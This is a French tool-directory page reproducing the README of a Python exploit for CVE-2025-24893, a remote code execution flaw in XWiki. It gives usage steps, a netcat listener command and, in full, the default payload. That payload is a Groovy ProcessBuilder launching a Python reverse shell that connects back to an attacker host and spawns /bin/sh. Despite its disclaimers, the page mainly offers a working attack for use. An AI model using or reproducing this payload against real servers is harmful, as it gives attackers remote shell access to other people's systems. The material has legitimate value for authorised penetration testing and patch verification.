Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-24893 — Exploit modifié pour CVE-2025-24893 | Kitploit
Outils/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Exploit modifié pour CVE-2025-24893

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893 XWiki RCE Exploit

Exploit Banner

Un simple script Python3 pour exploiter CVE-2025-24893, une vulnérabilité d'exécution de code à distance dans la plateforme XWiki, à l'aide d'une macro asynchrone basée sur Groovy et d'une charge utile de reverse shell configurable.

⚠️ AVERTISSEMENT : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.


Table des matières

  • Fonctionnalités
  • Prérequis
  • Installation
  • Utilisation
  • Détection et repli de protocole
  • Charge utile du reverse shell
  • Licence
  • Avertissement

Fonctionnalités

  • ✅ Détecte automatiquement si la cible prend en charge HTTPS ou HTTP
  • ✅ Construit un extrait Groovy ProcessBuilder pour éviter les particularités de Runtime.exec
  • ✅ Encode dans l'URL la charge utile de la macro asynchrone+groovy XWiki
  • ✅ Reverse shell configurable (hôte + port)
  • ✅ Affiche le code de réponse HTTP pour aider à vérifier la livraison

Prérequis

  • Python 3.6 ou supérieur
  • Bibliothèque requests
root@kitploit:~
pip install requests

Installation

Clonez ce dépôt :

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

Utilisation

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> L'hôte XWiki (par exemple wiki.example.local).

  • <LHOST> L'adresse IP de votre machine d'attaque (là où votre listener est en écoute).

  • <LPORT> Le port de votre listener (entier).


Exemple

  1. Démarrez un listener sur votre machine :
root@kitploit:~
nc -lvnp 4444
  1. Lancez l'exploit :
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. En cas de succès, consultez votre listener netcat pour obtenir un shell.

Détection et repli de protocole

Avant d'envoyer la charge utile, le script :

  1. Essaie https://<TARGET_DOMAIN>
  2. Tente http://<TARGET_DOMAIN> en repli si HTTPS échoue
  3. Se termine si aucun des deux n'est accessible

Cela permet d'assurer la compatibilité avec les déploiements à protocoles mixtes.


Charge utile du reverse shell

Par défaut, le script utilise un one-liner Python3 :

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • Vous pouvez modifier la fonction build_payload() si vous avez besoin d'un autre shell (par exemple Bash, Perl, PHP, etc.).

Licence

Ce projet est distribué sous la licence MIT. Consultez le fichier LICENSE pour plus de détails.


Avertissement

Cet outil est conçu uniquement pour les évaluations de sécurité autorisées et à des fins éducatives. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation explicite avant de tester tout système cible.

Télécharger l’outil